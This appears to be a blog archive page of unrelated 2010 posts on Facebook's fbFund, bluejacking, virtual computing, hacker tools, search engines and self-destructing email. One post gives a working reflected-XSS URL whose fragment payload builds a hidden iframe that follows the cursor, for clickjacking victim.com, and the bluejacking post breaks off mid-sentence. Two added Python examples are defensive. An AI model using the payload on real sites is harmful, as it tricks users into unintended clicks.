Archive for July, 2010


If you’re a software developer with a little ambition and a good idea, then Facebook may be the company that makes you a very wealthy person. The social networking site that began in 2004 as a way for college students to keep in touch has expanded to allow everyone to create their own Facebook page. Since then, Facebook has carved a niche for itself in the tech world as a company that is willing to break through the traditional barriers of business.

In May 2007, the company opened its platform, allowing software developers to add their programs to the Facebook site. This in turn allowed the site’s users to choose from a wide variety of programs and add them to their personal Facebook pages. To show that its platform is truly open, the company held f8, an eight-hour-long competition where developers created their own programs for Facebook’s interface. Eighty-five new programs — ranging from video sharing to a Scrabble offshoot — were added to Facebook as a result of f8.

Now, the company is taking its cultivation of new applications even further. In September 2007, Facebook founder Mark Zuckerberg announced the company has a $10 million pile of cash waiting for software developers who want to share their programs with Facebook. The company calls it the fbFund.

The grants range from $25,000 to $250,000, and a good idea could fatten a developer’s bank account. The company hasn’t announced any restrictions on the number of applications each developer can contribute, so potentially one developer could make a lot of money with a few applications. And while $250,000 isn’t anything to sneeze at, the fbFund grants are actually just the tip of the iceberg.

As it turns out, the company is interested in providing more than grants — it wants to serve as venture capitalists for the right application. Developers receiving grants from Facebook will not only get the initial cash, they will also maintain ownership of their programs. Facebook just wants first crack at providing the money needed to take the software and turn it into a viable start-up business.

It’s a basement software developer’s dream come true, and it’s no coincidence that the offer comes from a former basement software developer. Zuckerberg seems like Willy Wonka, having sent out the gold-wrapped candy bars and waiting patiently in his chocolate factory for the arrival of someone like Charlie.

Of course, Zuckerberg is probably not secretly planning on handing over the keys to Facebook’s front door. But with the fbFund, he has thrown out the traditional, frustrating search between venture capital and good ideas and simply put out notice of where the money can be found.

Facebook has attached only one stipulation to its fbFund: The company won’t consider applications from any developer or company that has already accepted venture capital from another source. This resolves two dilemmas. It spreads venture capital around to those who have been overlooked — an example of infracaninophilia, or love for the underdog. The stipulation also keeps Facebook out of any sticky potential legal battles over who actually owns the software backed by Facebook’s capital.

For unknown developers with good ideas and drive, Facebook’s fbFund offer could prove to be a cash cow.

Have you ever been doorbell ditching before? The point of the prank is simple: Sneak up to someone’s front door, knock loudly or ring the doorbell, and, instead of greeting whoever answers the door, run away and hide somewhere nearby. The joy of doorbell ditching is, of course, reveling in the homeowner’s confusion and rolling with laughter under the security of his nicely trimmed bushes. Although the game might get you in a bit of trouble if you happen to incite the ire of a cranky neighbor, it’s mostly a harmless joke on par with a prank phone call.

For more technically inclined pranksters with access to Bluetooth technology, however, there’s the digital version of doorbell ditching and prank phone calls: Bluejacking. A kind of practical joke played out between Bluetooth

Bluetooth technology operates by using low-power radio waves, communicating on a frequency of 2.45 gigahertz. This special frequency is also known as the ISM band, an open, unlicensed band set aside for industrial, scientific and medical devices. When a number of Bluetooth devices are switched on in the same area, they all share the same ISM band and can locate and communicate with each other, much like a pair of walkie talkies tuned to the same frequency are able to link up.

Bluetooth technology users take advantage of this ability to network with other phones and can send text messages or electronic business cards to each other. To send information to another party, the user creates a personal contact name in his or her phone’s address book — the name can be anything from the sender’s actual name to a clever nickname.

Bluejackers have devised a simple technique to surprise their victims: Instead of creating a legitimate name in the address book, the bluejacker’s message takes the place of the name. The prank essentially erases the “from” part of the equation, allowing a user to send any sort of comment he wishes without identifying himself.

For instance, if you’re sitting in a coffee shop and notice a fellow Bluetooth user sitting down to enjoy a cup of iced coffee, you could set up a contact under the name “Is your coffee cold enough?” After choosing to send the text via Bluetooth, the phone will search for other enabled Bluetooth devices; selecting one will send the unsolicited message to that device. A bluejacker’s crowning moment comes, of course, when the victim receives the message and expresses a mild mix of confusion and fear that he’s under surveillance.

Bluejacking is imprecise, however. Searching for other Bluetooth-enabled hardware might turn up a list of devices labeled with a series of numbers and letters. Unless the bluejacker’s target has chosen to publicly identify his or her phone, or it’s the only Bluetooth phone in the area, the bluejacker may have a hard time messaging his or her target on the first try.

Today, students and faculty can reserve and log in to the NCSU Virtual Computing Laboratory anytime, anywhere from their own PCs or laptops. What’s more, this remote-access system lets users choose the software they need, including industrial strength computer-assisted design (CAD) and engineering programs that take more memory than they have on their own systems. At the same time, professors can build customized software images in minutes for students to access anywhere. Virtual computing makes one computer act and perform like many computers.

Through virtual computing providers, users can download and use more than one operating system and perform a multitude of functions at the same time with a single mouse click, receiving all the benefits of additional programs and hardware without having to purchase or install them on their own computer. Executives can check their company e-mail on the road, students can take classes from home, and managers can keep up with documents stored on internal servers from anywhere in the world.

Virtual computing is increasing possibilities and performance in the world of information technology (IT): increased storage space, more software applications, performance and troubleshooting solutions, as well as data backup.

Those of us who do a lot of work in the security world have come to realize that there is a ton of cross site scripting (XSS) out there. 80% of dynamic sites (or more) suffer from it. But how many sites allow you to do HTML file uploads comparatively? It’s a much smaller number, and HTML upload typically requires some sort of login before you’re allowed to do it, so it’s a relatively small number of people who could be impacted by any sort of HTML file upload. But that is precisely what’s needed to mount a clickjacking attack (usually one or two pages). Either the attacker has to rent space in the cloud with a stolen credit card, or find some parasitic hosting somewhere.

That’s when I got to thinking… how can you use any old generic reflected XSS attack to mount a clickjacking attack? A few hours later I had a prototype that worked. Here’s how the attack would work. Let’s say a parameter like “search” was vulnerable to reflected XSS. An attacker could do something like:

http://example.com/?search=<script>eval(location.hash.slice(1))</script>

This is an old trick: whatever follows the # in the URL (the fragment, or anchor) is what the attacker wants to run as the attack. Fragments are never sent to the server; they are only seen on the client. So this effectively turns the reflected XSS into a DOM based XSS, which, incidentally, also leaves less of a signature on the server. The attacker’s fragment payload would then look something like this (this works only in Firefox):

http://example.com/?search=<script>eval(location.hash.slice(1))</script>#a=document.body.appendChild(document.createElement("iframe"));a.d=a.contentDocument;a.d.open().close();i=a.d.createElement("iframe");a.style.width=90;a.style.height=90;a.style.border=i.style.border=0;a.style.position=i.style.position="absolute";a.style.overflow=i.style.overflow="hidden";a.style.opacity=.3;i.style.width=100;i.style.height=100;i.style.left=-10;i.style.top=-10;i.src="http://www.victim.com/";a.d.body.appendChild(i);function followmouse(e){xcoord=ycoord=40;xcoord+=e.pageX-50;ycoord+=e.pageY-50;a.style.left=xcoord;a.style.top=ycoord;}document.onmousemove=followmouse;

So you have a reflected XSS on example.com that instantiates a DOM based XSS, which in turn instantiates a clickjacking attack against victim.com. Obviously you’d need to modify this to fit the right coordinates and work in other browsers, but this could easily be used to mount the attack in situations where an attacker might not otherwise be able to. For instance, if the clickjacking defenses only check the referrer, and the referrer is on the correct domain but a different sub-domain, that could be used to bypass them – and so on. Anyway, I thought some people might think this is interesting. Happy penetration testing!
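The sub-domain bypass mentioned above is easiest to see when a referrer-only check is placed next to a browser-enforced framing policy. The following is an added example, not code from the original post: weak_referer_check models a Referer-substring defence, and framing_allowed evaluates X-Frame-Options and CSP frame-ancestors headers the way a browser would; all host names and URLs in it are constructed.

```python
from urllib.parse import urlsplit

SITE = "victim.com"  # the framed site from the post; hosts below are constructed


def weak_referer_check(referer, site=SITE):
    """A referrer-only defence of the kind the post says can be bypassed:
    framing is allowed whenever the Referer host 'contains' the site name.
    Any sub-domain carrying a reflected XSS, or a look-alike host, passes."""
    host = urlsplit(referer).hostname or ""
    return site in host


def _origin(url):
    """(scheme, host, port) triple that browsers compare for same-origin."""
    parts = urlsplit(url)
    return (parts.scheme.lower(), (parts.hostname or "").lower(), parts.port)


def _host_matches(pattern, host):
    """CSP host-source match: exact host, or '*.example' for any sub-domain."""
    if pattern.startswith("*."):
        return host.endswith(pattern[1:])  # '*.victim.com' -> '.victim.com'
    return host == pattern


def framing_allowed(headers, embedder_url, target_url):
    """Would a browser let the page at embedder_url frame the page at target_url,
    given the target's response headers? Browser-enforced policy never looks at
    the Referer. Simplifications (assumptions): CSP host-sources are matched on
    host only, not scheme or port; frame-ancestors wins over X-Frame-Options."""
    h = {k.lower(): v for k, v in headers.items()}
    embedder_host = _origin(embedder_url)[1]
    same_origin = _origin(embedder_url) == _origin(target_url)

    for directive in h.get("content-security-policy", "").split(";"):
        name, _, value = directive.strip().partition(" ")
        if name.lower() != "frame-ancestors":
            continue
        allowed = False
        for source in value.split():
            src = source.strip("'").lower()
            if src == "none":
                return False
            if src == "self":
                allowed = allowed or same_origin
            elif src == "*":
                allowed = True
            else:  # host-source, possibly with a scheme prefix
                host = src.split("://", 1)[-1].split("/", 1)[0]
                allowed = allowed or _host_matches(host, embedder_host)
        return allowed

    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return same_origin
    return True  # no policy at all: any page, on any domain, may frame it


def compare_defences():
    """Constructed scenario from the post: XSS on a sibling sub-domain of the
    framed site. Returns (weak check passes?, XFO SAMEORIGIN allows?)."""
    attacker_page = "http://sub.victim.com/?search=%3Cscript%3E...%3C/script%3E"
    target = "http://www.victim.com/account"
    return (
        weak_referer_check(attacker_page),
        framing_allowed({"X-Frame-Options": "SAMEORIGIN"}, attacker_page, target),
    )


if __name__ == "__main__":
    print(compare_defences())  # (True, False)
```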

INTERNET HACKER TOOLS

Hackers are generally lazy but intelligent, which means they don’t like doing something boring that they can program the computer to do for them instead. As a result, hackers have unleashed a variety of tools designed to make their lives easier (but their victims’ lives more miserable). Some of these tools include scanners (to find open ports on vulnerable computers), remote Trojan horse programs (to take over a computer through the Internet), and password crackers (designed to exhaustively try out different password combinations until they find one that works). To see what types of tools hackers may use against you, browse through the following:

AOHell

Released around 1995, AOHell defined the standard for online harassment programs and quickly spawned numerous copycats for harassing other online services including CompuServe, Prodigy, and the Microsoft Network. Written in Visual Basic 3.0, AOHell was a relatively simple program that helped hackers send spoofed email, create phony credit card numbers for making fake AOL accounts, con AOL users out of passwords and credit card numbers, and send insulting messages to others in chat rooms.

AOHell, the first and original online harassment tool.
Although AOHell initially caused problems for America Online users, the program is now obsolete. Few hackers are currently developing AOHell copycat programs, preferring to channel their energy towards creating more sophisticated Internet hacking tools such as port scanners or harassment tools that cause chaos on IRC or in ICQ chat rooms.

BO2K – Back Orifice

With a name deliberately chosen to mock Microsoft’s Back Office program, Back Orifice caused a sensation when released in 1998 as one of the first remote access Trojan horse programs that could remotely control another computer over a phone line or through the Internet.

Back Orifice 2000 is the latest incarnation of the popular and ground-breaking remote access Trojan horse.
Developed by a hacker group calling themselves the Cult of the Dead Cow, Back Orifice (http://www.bo2k.com) made headlines again in 1999 when it was released at DefCon 7.0 with improvements, including the option of adding plug-in programs written by others, and the complete C/C++ source code so that anyone could study and modify the program. Ironically, when introduced at DefCon, the Back Orifice 2000 CD was infected by the Chernobyl (CIH) virus.

Although Back Orifice still poses a threat to computers, the buzz surrounding BO2K has faded. Still, the program has spawned numerous remote access copycat programs that have improved upon the original Back Orifice design, and despite its age, Back Orifice remains a favorite tool for hackers to probe computers connected to cable or DSL modems.

Crack Whore

One of the new breed of website hacking programs, Crack Whore uses a brute force/dictionary attack against a website to find the password to a legitimate account. Since so many people use weak, easy to guess passwords, programs like Crack Whore are surprisingly successful far more often than they should be!

Crack Whore probes a website for easily-guessed passwords to give a hacker access to a system.
Once hackers have access to a legitimate account, they can either modify web pages and other data directly or attempt to burrow through the system and either gain access to additional accounts or elevate the current account to get greater access to the rest of the computer hosting a particular website.

The wise man doesn’t give the right answers, he poses the right questions.

–Claude Lévi-Strauss

There are two problems with information: not having enough, and having too much. Without all the necessary information about a topic, it’s easy to make a wrong decision based on an incomplete picture of reality. Then again, having too much information can be just as bad, since finding the relevant facts about a topic can be time-consuming and tedious, which encourages people to make snap decisions based on perception rather than accuracy.

Trying to find just enough useful facts without being overwhelmed by too much irrelevant trivia can be a delicate balancing act. Still, if you want to make informed choices based on reason and information rather than on emotion and ignorance, you must take the time to research your topic thoroughly.

As a research tool, the Internet offers a wealth of information about virtually every topic. Unfortunately, the Internet poses a few problems of its own when it comes to research:

How do you find the information you need?

How do you know if the information you find is accurate, obsolete, misleading, or just plain wrong?

Finding information on the Internet is relatively easy: You just type one or more words into a search engine, and then the search engine lists all the websites (that it knows about) that contain the words or phrases you want to find.

The easy part is sifting through the different websites to find the information you need. The hard part is deciding whether you can trust what you find, knowing that every source of information selectively chooses which facts to report and which ones to omit. Because we all have a natural tendency to interpret facts based on personal biases and experience, don’t be surprised to find that one set of facts may cause you to reach a conclusion that’s completely different from what someone else might reach.

Sometimes there might be a right answer and sometimes there might be a wrong answer, but more often than not, there won’t be any one answer that’s either completely right or completely wrong. What you decide may be the right answer depends on your point of view.

The key to finding anything on the Internet is to use a search engine, but if you ask different search engines to find the same information, each one will find a number of websites not found by the others. Rather than limiting yourself to the tunnel vision of a single search engine, experiment with some of the different search engines listed below, and you may uncover information that your favorite search engine missed.

Even better, you may find that one search engine is better at finding certain types of data or offers a unique perspective to searching for information. For example, the Teoma search engine tries to cluster search results into subjects. So if you search for “Mustang,” the Teoma search engine clusters the results according to “Ford Mustang” and “Mustang horses.” The following list includes some of the more powerful search engines:

About
http://about.com

AlltheWeb
http://www.alltheweb.com

AltaVista
http://www.altavista.com

AOL Search
http://search.aol.com/

Ask Jeeves
http://www.askjeeves.com

Google
http://www.google.com

Hotbot
http://www.hotbot.com

LookSmart
http://www.looksmart.com

MSN
http://www.msn.com

Open Directory Project
http://dmoz.org

Teoma
http://www.teoma.com

Yahoo!
http://www.yahoo.com

Meta-search engines
Rather than visit multiple search engines yourself, you can save time by using a meta-search engine, which simultaneously sends your query to two or more general-purpose search engines and eliminates duplicate results. Here are some popular meta-search engines:

DogPile
http://www.dogpile.com

Mamma
http://www.mamma.com

MetaCrawler
http://www.metacrawler.com

Search.com
http://www.search.com

Specialized search engines
Finally, don’t ignore specialized search engines designed to search only for websites pertaining to a particular topic. Specialized search engines often find obscure websites that the larger search engines might overlook. There are specialized search engines for everything from caring for fish to the latest crafting fads. Here are a few interesting ones:

AvatarSearch Finds occult information about witchcraft, vampires, pagan rituals, astrology, tarot cards, and other topics that often panic right-wing conservatives (http://www.avatarsearch.com).

Black Web Portal Finds websites of particular interest to blacks (http://www.blackwebportal.com).

Crime Spider Searches for websites providing information about various crime and law enforcement sites and organized by topics such as serial murder, urban legends, and cybercrime (http://www.crimespider.com).

Disinformation Conspiracy theory-laden search engine that helps you uncover websites offering the “real truth” behind the pyramids of Mars, the sightings of black helicopters over America, film footage of Bigfoot, and the government secrets hidden in Area 51 (http://www.disinfo.com).

Education World Finds websites that can help students, teachers, and parents learn more about education (http://www.education-world.com).

Federal Web Locator Lists many of the websites from various government agencies and organizations (except for the really cool ones like the CIA and FBI). Maybe you can use it to find out where all your hard-earned tax dollars are going (http://www.infoctr.edu/fwl).

GovSearch Collection of government search engines for finding information about the U.S. government: IRS documents, Customs Service, NTIS, U.S. law code, legislative information, OSHA regulations, and information from many other agencies and departments (http://www.nwbuildnet.com/nwbn/govbot.html).

CopSeek Directory and Police Search Engine Helps you find websites related to law enforcement so you can find a policeman when you need one (http://www.copseek.com).

NerdWorld Search engine dedicated to computer and technology fanatics (http://www.nerdworld.com).

Que Pasa! A bilingual search engine geared towards Hispanics and Latinos, available in both English and Spanish (http://www.quepasa.com).

Satanist Net Search engine geared to helping you find satanic information on the Internet (http://www.satanist.net).

Women.com and WWWomen Two search engines geared toward helping women find information and resources on the Internet (http://www.women.com and http://www.wwwomen.com).

Kid-safe search engines
If you leave your children unsupervised, it’s likely that they’ll eventually find bomb-making instructions and pornography on the Internet. While keeping children isolated from such information may be impossible, you can at least limit their searching to kid-safe search engines. Unlike general-purpose search engines, kid-safe search engines won’t accidentally display links to pornographic or bomb-making websites. Try one of the following:

Ask Jeeves for Kids
http://www.ajkids.com

CleanSearch
http://www.cleansearch.com

Go.com
http://www.go.com

Yahooligans
http://www.yahooligans.com

Multimedia search engines
Most search engines help you find text, but what if you want to find a song, a picture, or a video clip? Rather than waste your time using a general-purpose search engine to find an MP3 file of your favorite band, try using a special multimedia search engine instead. These multimedia search engines specialize in searching only for specific audio, graphic, or video files.

Here are some of the more popular multimedia search engines:

Ditto
http://www.ditto.com (see Figure 1-1)

FAST Multimedia Search
http://multimedia.alltheweb.com

SpeechBot.net
http://speechbot.research.compaq.com

MIDI Explorer
http://www.musicrobot.com

Search within categories
Many search engines, such as Yahoo!, display categories such as Computers & Internet or Business & Economy. If you click on a category and then use the search engine, you’ll have the option of searching the entire Internet or limiting your search to within the currently selected category. Obviously searching within a selected category will take less time and avoid a lot of irrelevant websites.

Still, you might like to search the entire Internet just for the surprise of seeing what the search engine might uncover that is not in your specific category.

Use specific words
If you want to find all websites that focus on birds, you could type the word “bird” into a search engine. Unfortunately, the search engine might return thousands of irrelevant websites that talk about badminton birdies or different ways to cook game birds. Instead of searching for general words, use more specific words such as “ornithology” (which is the branch of zoology dealing with birds). The more precise your search terms, the less likely the search engine will be to return irrelevant websites.

Use multiple words
You can also narrow your search by typing in multiple words. For example, if you wanted to find information about Miami, Florida, type in the two words “Miami” and “Florida.” If you just search for “Miami” or “Florida,” the search engine might bombard you with websites about the Miami Dolphins football team or the Florida Marlins baseball team. In general, the more words you search for, the more likely the search engine will find exactly what you want.

Use Boolean operators
Many search engines allow you to focus your search by using two different Boolean operators: AND and OR.

If you wanted to search for all websites that contain both the words “hot” and “dog,” you would simply type the following into the search field:

hot AND dog

This search would find websites devoted to hot dogs, but could also turn up websites that talk about ways to cool down a dog on a hot day.

If you wanted to search for all websites that contain either the word “hot” or “dog,” you would type the following into the search field:

hot OR dog

This could turn up websites that talk about hot dogs along with sites that mention dogs, different ways air conditioning can cool you down on a hot day, hot chili sauces, or dog food.

Be wary of what you find
The order in which a search engine ranks websites can influence which ones people visit, so to increase the odds that people will visit a specific website, some websites pay search engines to put them first (or at least near the top) in any list of related websites. The better search engines identify which websites paid for greater exposure, but other search engines may not be so honest.

Also, because search engines scan websites for keywords that people are most likely to search for, many websites hide multiple copies of the same keyword on their web pages. This tricks a search engine into thinking the website contains more information about a particular keyword than it really does.

As with reading newspapers, listening to the radio, or watching the news on television, always be wary of the source of your information. Search engines can find information for you, but they can’t verify the accuracy of the information. Anyone can put any information on a website.

No search engine will find everything available on the Internet, so be sure to use several search engines to find websites that other search engines might not have found. The more search engines you use, the more information you’ll find, and the more information you find, the more likely you’ll have most of the facts you need to make an intelligent decision.

Sometimes the hardest part about finding an answer is knowing how to look for it in the first place. With so many different search engines available at your fingertips, there’s no excuse for not finding the information you want on the Internet right away.

Email can form a long incriminating trail of evidence, so you should also delete your email regularly and shred your email message directories. Since this can be a nuisance, several companies have come up with self-destructing email. The idea is that after a certain amount of time, the email message either shreds itself (using a secure file-shredding method that can defeat ordinary undelete programs) or encrypts itself so it can’t be read after a certain date.

Omniva (http://www.disappearing.com) offers a unique self-destructing version of email. When you send a message to someone and run the Omniva Policy Manager program, you receive a unique encryption key from the Omniva Access server. Using this key, you can encrypt your message and send it out on the Internet. When someone wants to read your email, their mail software has to fetch that encryption key from the Omniva Access server, which unlocks the message.

However, once the expiration date of the message has passed, the Omniva Access server destroys the encryption key needed to open the message, effectively locking out anyone who tries to read the message ever again. In this case, the email isn’t physically destroyed, but is rendered useless.
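The Omniva scheme described above, modelled as an added example (this is not Omniva’s software): a key server issues a per-message key, the sender encrypts with it, the recipient must fetch the key to read, and after expiry the server destroys it. Standard library only; the SHA-256 counter-mode keystream with an HMAC tag is an illustrative stand-in for a real authenticated cipher, and the message ids, clock values and message text are constructed.

```python
import hashlib
import hmac
import secrets


class KeyServer:
    """Stand-in for the Omniva Access server: keeps one key per message and
    destroys it once the message's expiry time has passed."""

    def __init__(self):
        self._keys = {}  # message_id -> (key, expires_at)

    def issue_key(self, now, ttl_seconds):
        message_id = secrets.token_hex(8)
        key = secrets.token_bytes(32)
        self._keys[message_id] = (key, now + ttl_seconds)
        return message_id, key

    def fetch_key(self, message_id, now):
        """The key, or None once it has been destroyed (or never existed)."""
        self.purge_expired(now)
        entry = self._keys.get(message_id)
        return entry[0] if entry else None

    def purge_expired(self, now):
        for mid, (_, expires_at) in list(self._keys.items()):
            if now >= expires_at:
                del self._keys[mid]  # gone for good; no copy is kept anywhere


def _keystream(key, nonce, length):
    """SHA-256 in counter mode: an illustrative keystream (assumption) standing
    in for a real authenticated cipher such as AES-GCM."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def encrypt(key, plaintext):
    nonce = secrets.token_bytes(16)
    stream = _keystream(key, nonce, len(plaintext))
    body = bytes(p ^ k for p, k in zip(plaintext, stream))
    tag = hmac.new(key, nonce + body, hashlib.sha256).digest()
    return nonce + body + tag


def decrypt(key, blob):
    nonce, body, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(key, nonce + body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("message tampered with or wrong key")
    return bytes(c ^ k for c, k in zip(body, _keystream(key, nonce, len(body))))


def send_message(server, plaintext, now, ttl_seconds):
    """Sender side (the 'Policy Manager' step): obtain a per-message key, encrypt,
    and hand out only the ciphertext plus the message id."""
    message_id, key = server.issue_key(now, ttl_seconds)
    return message_id, encrypt(key, plaintext)


def read_message(server, message_id, blob, now):
    """Recipient side: readable only while the server still hands out the key."""
    key = server.fetch_key(message_id, now)
    return None if key is None else decrypt(key, blob)


def demo():
    """Constructed timeline: sent at t=1000 with a one-hour life, read once before
    expiry and once after. Returns (plaintext_before, result_after)."""
    server = KeyServer()
    mid, blob = send_message(server, b"minutes - delete by Friday", now=1000, ttl_seconds=3600)
    before = read_message(server, mid, blob, now=2000)
    after = read_message(server, mid, blob, now=4600)  # 1000 + 3600: key destroyed
    return before, after
```

Expiry only stops new key fetches: the ciphertext itself is never destroyed, and a recipient who fetched the key in time, or saved the decrypted text, keeps the content.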

Another company that offers self-destructing email is Infraworks (http://www.infraworks.com), which offers a program called InTether. The InTether program consists of a Receiver and a Packager. To send a file (text, video, audio, etc.), you encrypt it using the Packager program. To read, view, or hear the file, another person needs the Receiver program. After a specified date, or after someone opens the file a certain number of times, the Receiver package can delete and shred the file.